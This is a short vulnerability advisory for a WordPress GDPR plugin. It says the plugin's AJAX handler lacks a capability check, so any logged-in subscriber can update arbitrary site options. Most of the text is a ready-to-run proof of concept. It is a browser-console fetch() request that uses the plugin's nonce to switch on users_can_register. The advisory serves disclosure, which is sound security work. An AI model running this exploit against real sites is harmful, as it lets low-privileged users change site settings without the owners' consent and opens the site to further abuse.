Description The plugin is vulnerable to arbitrary option updates due to a missing capability check on its AJAX request handler, allowing any authenticated users, such as subscriber to update arbitrary site options
Run the below command in the developer console of the web browser while being on the blog as subscriber user to set the users_can_register option to true.
fetch("/wp-admin/admin-ajax.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"method": "POST",
"body": 'action=wpgdprc_update_integration&data={"name":"users_can_register","value":true,"type":"yolo"}&security=' + wpgdprcAdmin['ajaxNonce'],
"credentials": "include"
}).then(response => response.text())
.then(data => console.log(data));